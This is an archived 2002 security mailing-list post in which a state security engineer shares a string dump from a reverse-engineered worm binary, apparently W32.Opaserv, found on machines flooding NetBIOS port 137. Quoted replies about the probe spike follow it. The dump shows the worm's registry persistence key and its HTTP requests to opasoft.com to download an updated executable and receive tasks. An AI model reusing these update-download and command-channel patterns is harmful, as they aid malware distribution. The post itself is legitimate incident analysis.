We had some internal machines that were contributing to the netbios flood attack. These machines were sniffed and from that we found a file on the identified machines named scrsvr.exe. The file was reversed engineered and the results are listed below. While some are attributing the netbios activity to Bugbear@mm it does not follow what we were seeing. It is known as W32.Opaserv.Worm. Comments? ScrSvr31415.KERNEL32.dll.RegisterServiceProcess.SOFTWARE\Microsoft\Wind ows\CurrentVersion\Run.Software\Microsoft\Windows\CurrentVersion\Interne t Settings.ScrSvr.ScrSvrOld.ProxyEnable.ProxyServer.\ScrSvr.exe.ScrSin.dat .ScrSout.dat.scrupd.exe.www.opasoft.com.GET http://www.opasoft.com/work/scheduler.php?ver=01&task=newzad&first=0 HTTP/1.1..Host: www.opasoft.com.....GET http://www.opasoft.com/work/lastver HTTP/1.1..Host: www.opasoft.com.....GET http://www.opasoft.com/work/scrsvr.exe HTTP/1.1..Host: www.opasoft.com.....POST http://www.opasoft.com/work/scheduler.php?ver=01&plain=0123456789ABCDEF& cipher1=0123456789ABCDEF&cmpmask=FFFFFFFFFFFFFFFF&key=123456&res=0 HTTP/1.1..Host: www.opasoft.com..... OK.PLAIN.CIPHER1.KEY.................................................... .................WINDOWS\scrsvr.exe..WINDOWS\win.ini.c:\tmp.ini.c:\windo ws\scrsvr.exe.,.windows.run.......................................... CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..!..LOCALHOST X..wO...?..................?......-@..*@..*@..*@..*@..*@..*@..+@..+@.&+@ .5+@.D+@.S+@.b+@.q+@..+@..+@..+@..+@..+@..+@..+@..,@..,@. ,@./,@.I,@.X,@..O......:.l.Y..xO....i!....~:.V.....o.8N.p!...[...z..O..[ ..l.5......c4.Z...~.K/..jM...8.....[..|}..5.o...'.\..N..o....}...5.\'.N. .B.t..a.P?.....K(....r....Yj4.......,i...=N.{S....\)..:{.A....mM.+.....> ..|R.h..K...4z...`..R.,./.Hj.....6.P..rr.N....-.l...5V.................. ....... .......91)!....:2*"....;3+#....<4,$?7/'....>6.&....=5-%................. ............................. !"#$%&'()*+,-./012345678.........................................)4.%/7. ..(3-!0..,1'8"5...*2$. .. .KERNEL32.dll.ADVAPI32.dll.USER32.dll.WS2_32.dll...LocalAlloc....GetCurr entProcess...ExitThread..d.SetFilePointer.. .ResetEvent....ReadFile..H.CreateMutexA....LocalFree...GetModuleFileName A..p.SetPriorityClass..[.SetEndOfFile....GetModuleHandleA....RegisterSer viceProcess../.GetPrivateProfileStringA..3.GetProcAddress....ExitProcess .4.CopyFileA...LocalReAlloc..M.CreateProcessA..'.CloseHandle...WaitForSi ngleObject...Sleep.T.CreateThread..@.CreateFileA...GetLastError..V.SetCu rrentDirectoryA.._.DeleteFileA...GetFileSize...WriteFile...WritePrivateP rofileStringA....lstrcat...lstrcmpi....lstrlen.t.GetWindowsDirectoryA... .RegSetValueExA....RegQueryValueExA....RegOpenKeyExA...RegDeleteValueA.. .RegCloseKey...PeekMessageA....DispatchMessageA..`.TranslateMessage..j.s ocket..f.send..d.recvfrom..c.recv..].inet_addr.S.gethostname.R.gethostby name.P.connect.O.closesocket.N.bind..?.WSAStartup..g.sendto....WSAGetLas tError...WSAEventSelect....WSAEnumNetworkEvents....WSACreateEvent....WSA CloseEvent....... .0*040.0.0.0.0.0.0.0.0.1 1'191E1a1.1.1.1.1.1.1.1.1.1.2.2!2&2L2U2j2.2.2.2.2.2.2.3.3 3.0.0j1.2V4o4v4.4.4.4.4.515k5.5.516.9.:9:.:.:.:.;.;.;.;$;.;8;?;O;h;~;.;. ;.;.<.<(<-<><R<d<y<.<.<.<.<,=T=c=.=.=M>s>~>.>.>.>.>.>.>.>.?.?"?a?q?.?... .. ..l....2:4.4.4.6.6.606H6Y6j6p6u6.6.6.6.6.6)757~7.7.7.7.7.7.7.7.7.8-868Q8 ]8x8.8.8.8.8.8.8.8.8.9.9&919F9O9Z9o9x9.9.9.9.9.9.9.9.9.9.9.9.9.9.:.:.:.: 1:<:S:u:.:.:.:.;1<t<|<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=!=)=1=9=A=I= V=^=f=n=v=~=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.>.>.>$>,>4>;>A>F>N>j>x>.>.>.> .>.>.>.>.>.>.>.>.>.>.>.?"?0?>?F?Y?f?t?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.. ...0..X....0.0.0.0"0(0-050Q0_0m0x0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1(161A1 L1V1d1l1}1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.1.2.2.2.2"2*20262<2D2I2Q2W2]2c2{2 .2.2.2.2.2.2.2.2.2.2.2.2.2.3.3.3$3.343<3H3N3T3\3j3r3z3.3.3.3.3.3.3.3.3.3 .3.3.3.3.3.3.3.3.4.4.4.4%4-454=4E4M4U4[4a4g4o4t4|4.4.4.4.4.4.4.4.4.4.4.4 .4.4.4.5.5$5*50585@5F5L5R5X5]5e5.5.5.5.5.5.5.5.5.5.5.5.5.5.5.6.6.6.6.6)6 1696A6I6Q6Y6a6i6q6y6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.6.7.7.7.7%7-747:7 B7K7S7[7a7f7l7v7~7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8.8.8.8.8.8&8,848:8E8 I8P8X8`8h8p8x8.8.8.8.8.8.8.8.8.8.8.8.8.8.8.9.9.9%9+91969>9Z9f9r9x9.9.9.9 .9.9.9.9.9.9.9.9.:.:.:.:.:::F:R:X:o:u:{:.:.:.:.:.:.:.:.:.:.:.:.:.:.;&;2; 8;O;U;[;a;f;n;.;.;.;.;.;.;.;.;.;.;.;.<.<.</<5<;<A<F<N<j<v<.<.<.<.<.<.<.< .<.<.<.<.<.<.=.=.= =(=0=7=D=P=^=u={=.=.=.=.=.=.=.=.=.=.=.>.>.>.><>J>R>k>s>{>.>.>.>.>.>.>.>. >.>.>.?.?.?.?<?J?R?k?s?{?.?.?.?.?.?.?.?.?.?.?...@..t....0.0.0.0<0J0R0k0s 0{0.0.0.0.0.0.0.0.0.0.0.1.1.1.1<1J1R1k1s1{1.1.1.1.1.1.1.1.1.1.1.2.2.2*26 2>2I2R2Y2f2l2t2|2.2.2.2.2.2.2.2.2.2.2.2.2.2.3.3%333<3D3W3e3m3s3}3.3.3.3. 3.3.3.3.3.3.3.3.3.3.4.4.4!4'4;4B4J4R4X4`4|4.4.4.4.4.4.4.4.4.4.4.4.5.5.5. 5&5B5P5^5f5.5.5.5.5.5.5.5.5.5.5.5.5.6!6+636;6A6P6l6w6}6.6.6.6.6.6.6.6.6. 6.6.6.7.7.7.7"7*797G7Q7]7d7i7o7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.7.8!8/8=8E8V 8\8b8h8p8x8.8.8.8.8.8.8.8.8.8.8.9.9"9(9.949:9G9O9k9w9.9.9.9.9.9.9.9.9.9. 9.:.:.:.:.:.:.;.;.;.;-;P;_;h;n;w;.;.;.;.;.;.;.;.<-<P<V<\<b<h<n<t<z<.<.<. <.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.<.=.=.=.=.="=(=.=4=:=@=F=L=R=X=^=d =j=p=v=|=.=.=.=.=.=.=.=.=...P..p....3.3.3.3.4.4.4.4.4.4.4.4 4$4(4,4044484<4@4D4H4L4P4T4X4\4.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?.?. ?.?.?...`..L....0.0.0.0.0.0.0 0$0(0,00080<0@0D0H0L0P0X0\0`0d0h0l0p0x0|0.0.0.0.0.0.................. Richard Grant [CNA, GSEC] Security Engineer Governor's Office for Technology Commonwealth of Kentucky Phone: 502-564-5792 Fax: 502.564.6856 richard.grantat_private Web: http://www.state.ky.us/got/ois/security/security.html > CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is for the sole use of the intended recipient(s) and may contain confidential and privileged information. Any unauthorized review, use, disclosure or distribution is prohibited. If you are not the intended recipient, please contact the sender by reply e-mail and destroy all copies of the original message. > > -----Original Message----- From: Emeric Miszti [mailto:emericat_private] Sent: Monday, September 30, 2002 11:55 AM To: incidentsat_private Subject: Re: Unusual volume: UDP:137 probes On Monday 30 Sep 2002 9:33 am, Mark Forsyth wrote: > On Monday, September 30, 2002 9:02 AM, John Sage > [SMTP:jsageat_private] wrote: > > This has received some mention on the UNISOG list and elsewhere, but > > not here. > > > > Some people have been seeing unusually high volumes of UDP:137 probes > > since about 09/27/02 late, or early 09/28/02. > > A few people (who log sych things) on the Optus cable network in Australia > have been seeing it too. > In my case since Sep 20 it's gone ... > Sep 20 2 hits > Sep 21, 22, 23 0 hits > Sep 24 3 hits > Sep 25 0 hits > Sep 26 4 hits > Sep 27 2 hits > Sep 28 156 hits Starting at 02:20 (Aust. EST) > Sep 29 410 hits > Sep 30 406 hits up until 18:24 > Been seeing exactly the same spike with same patterns. Up from 40 odd scans on 28/9/2002 to 495 already today. Incidents.org have picked this up at the Internet Storm Center http://isc.incidents.org/port_details.html?port=137 No explanations or reasons been given by anyone yet. -- Emeric Miszti UK Security Online http://www.uksecurityonline.com Tel No: 0870 088 5689 Fax No: 0870 706 2162 PGP Public Key available at http://www.uksecurityonline.com/emeric.asc ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com Inbound message certified virus free. ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Oct 01 2002 - 12:14:14 PDT